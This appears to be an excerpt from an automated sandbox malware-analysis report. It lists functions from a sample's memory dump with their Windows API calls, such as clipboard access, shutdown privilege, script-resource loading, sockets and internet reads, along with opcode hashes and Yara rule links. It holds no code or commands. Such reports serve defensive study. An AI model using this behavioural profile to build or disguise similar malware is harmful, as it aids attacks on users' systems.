                                                                                                                                                                                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ac949853528c41ad18694ffecb658e95a439c3f49d534a4f45ab2d4066255fab
                                                                                                                                                                                                                                                                                        • Instruction ID: 379c2faf4c25ef41bc3452afb3e57b107295d9bd5da6546a88ef5855b54bce5b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac949853528c41ad18694ffecb658e95a439c3f49d534a4f45ab2d4066255fab
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6419F31A04615AFD310CF15D888F15BBE4FF44328F24C4AAE4198F6A2C735ED46EB92
                                                                                                                                                                                                                                                                                        Function 00F6F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F62010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6205A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F62010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F62087
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F62010: GetLastError.KERNEL32 ref: 00F62097
                                                                                                                                                                                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00F6F249
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                        • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                        • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                        • Opcode ID: c68f98c86a831850c6b155a894b49fdbd2b5b415bbb17a67d74d32dbdbb1c44c
                                                                                                                                                                                                                                                                                        • Instruction ID: c9c37df0062379d4eb4662c337a47e25060d63b763c475bf5666c512760ecce4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c68f98c86a831850c6b155a894b49fdbd2b5b415bbb17a67d74d32dbdbb1c44c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B01F97BA102146BEB1867B8BCAAFBF736CAF08354F154531FD12E21D1D5648D48B990
                                                                                                                                                                                                                                                                                        Function 00F3BCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3BD54
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3BD78
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3BEFF
                                                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00FA46D0), ref: 00F3BF11
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00FD221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00F3BF89
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00FD2270,000000FF,?,0000003F,00000000,?), ref: 00F3BFB6
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3C0CB
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 314583886-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c99b256e2ad06e1c3d4fc365d1bd9af599b288ac6701205793eac76edea1c06b
                                                                                                                                                                                                                                                                                        • Instruction ID: 350aec50509d313ab9ff772a85a21e78d9eddd9c2362390393eb8af778ad6104
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c99b256e2ad06e1c3d4fc365d1bd9af599b288ac6701205793eac76edea1c06b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4C13A72D002099FDB209F78DC61BAABBB9EF51330F1441AAE694DB251D7348E41FB90
                                                                                                                                                                                                                                                                                        Function 00F73A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F456C2,?,?,00000000,00000000), ref: 00F73A1E
                                                                                                                                                                                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F456C2,?,?,00000000,00000000), ref: 00F73A35
                                                                                                                                                                                                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00F456C2,?,?,00000000,00000000,?,?,?,?,?,?,00F066CE), ref: 00F73A45
                                                                                                                                                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00F456C2,?,?,00000000,00000000,?,?,?,?,?,?,00F066CE), ref: 00F73A56
                                                                                                                                                                                                                                                                                        • LockResource.KERNEL32(00F456C2,?,?,00F456C2,?,?,00000000,00000000,?,?,?,?,?,?,00F066CE,?), ref: 00F73A65
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                        • String ID: SCRIPT
                                                                                                                                                                                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                        • Opcode ID: 1b6929b7b87402ed2306a262144f5b34f3350b5455bd25963cab3136c1f76108
                                                                                                                                                                                                                                                                                        • Instruction ID: 792325c03d05484e3f2f31ac3c3cf193960176171ef785755b989521e42eed6c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b6929b7b87402ed2306a262144f5b34f3350b5455bd25963cab3136c1f76108
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE118E75600705BFE7218F25DC49F67BBB9EBC5B50F24826EB406D61A0DB71ED00AA21
                                                                                                                                                                                                                                                                                        Function 00F620AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F61916
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F61922
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F61931
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F61938
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F6194E
                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00F61C81), ref: 00F620FB
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F62107
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00F6210E
                                                                                                                                                                                                                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F62127
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00F61C81), ref: 00F6213B
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F62142
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 41d40fb42b5fb99784cd8921a0e87c19e8c96ca7b52542fe3c72250c3a23b455
                                                                                                                                                                                                                                                                                        • Instruction ID: e92386e5201092910327386e85220e857b45cd97066073f0f8cd8001dca9ff51
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41d40fb42b5fb99784cd8921a0e87c19e8c96ca7b52542fe3c72250c3a23b455
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA11D072900608FFDB509F64CC49BAE7BB9EF46366F244019E94197120C7369941EB60
                                                                                                                                                                                                                                                                                        Function 00F7A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00F7A5BD
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00F7A6D0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F742B9: GetInputState.USER32 ref: 00F74310
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F742B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F743AB
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00F7A5ED
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00F7A6BA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                        • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                        • Opcode ID: 865ab91562d0c30f2741fce135d5a0fe95dfb12780994bee4ba2827c26d101a0
                                                                                                                                                                                                                                                                                        • Instruction ID: 95a4ba807a0f0fe1d7964895027d3b82e99cf6ca3dbe2bae87a940f14aed6347
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 865ab91562d0c30f2741fce135d5a0fe95dfb12780994bee4ba2827c26d101a0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC41527190020A9FDF14EFA4CD45EEEBBB4EF45310F258056E819A21A1EB349E54EF62
                                                                                                                                                                                                                                                                                        Function 00F022AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,?), ref: 00F0233E
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00F02421
                                                                                                                                                                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00F02434
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Color$Proc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 929743424-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 32037957f3b30e4f4575d29e7af12ac9e5549cda2c9e7f16e9ea0bc7eed76715
                                                                                                                                                                                                                                                                                        • Instruction ID: 78e0affcc33f13c007d30545d3942f03705abd2bfd7e63bc794ee372b047e684
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32037957f3b30e4f4575d29e7af12ac9e5549cda2c9e7f16e9ea0bc7eed76715
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 288168B2508004BEF668A63C8C9CF7F795EEB42324F16010AF942C65D6CA5D9F42F276
                                                                                                                                                                                                                                                                                        Function 00F82263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F83AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F83AD7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F83AAB: _wcslen.LIBCMT ref: 00F83AF8
                                                                                                                                                                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F822BA
                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00F822E1
                                                                                                                                                                                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00F82338
                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00F82343
                                                                                                                                                                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 00F82372
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5f3a3624d84fc065c510a8b532e268f0a810673425ddbb7f1801fac64701cf6b
                                                                                                                                                                                                                                                                                        • Instruction ID: 1d11ca6e0291a8db39bf60760f8afd5341f25111884fc6d99b02bb18e0a8a235
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f3a3624d84fc065c510a8b532e268f0a810673425ddbb7f1801fac64701cf6b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2951F371E00200AFE710AF24D886FAA77E5AB44754F588088F9455F3C3C779AC42EBE1
                                                                                                                                                                                                                                                                                        Function 00F926DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a0f8c515de1d3d372b585c618a63ec4e6a03260d1ed60c800f847f3292b6a295
                                                                                                                                                                                                                                                                                        • Instruction ID: bceb940321b174025c5c885c5337806ab142c4f07f1fa3f94d583428532ca79c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0f8c515de1d3d372b585c618a63ec4e6a03260d1ed60c800f847f3292b6a295
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2213831B00200AFFB509F6AD844B1A7BE4FF84320F19806DE8499B351C772EC42EB92
                                                                                                                                                                                                                                                                                        Function 00F7D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00F7D8CE
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00F7D92F
                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000), ref: 00F7D943
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b00a2c4b6abd9dc1d8d72bacf1386c71c04938dc02fb96df10d974490f16163c
                                                                                                                                                                                                                                                                                        • Instruction ID: fc0ed2b024237e17835ca45716fe910d1ec49e146f7ae9076591c0290b6d68c9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b00a2c4b6abd9dc1d8d72bacf1386c71c04938dc02fb96df10d974490f16163c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9421B071900705ABE7209FA5D884BABB7FCAF40324F60841FE24A92141E774EA04EB52
                                                                                                                                                                                                                                                                                        Function 00F6E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?,00F446AC), ref: 00F6E482
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00F6E491
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F6E4A2
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F6E4AE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 35247c19cbd2c30ce4838e2c0e806ba31f08256500519376f10825072eec13ba
                                                                                                                                                                                                                                                                                        • Instruction ID: 7d65dd41b86f7650c98ed2446cd9426b3b6036ca9069a5fd8507b49ce1006515
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35247c19cbd2c30ce4838e2c0e806ba31f08256500519376f10825072eec13ba
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66F0E53A81191457D210A73CEC0D8AB776DAE03335B604702F836C20F0DB789D95BA95
                                                                                                                                                                                                                                                                                        Function 00F5E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
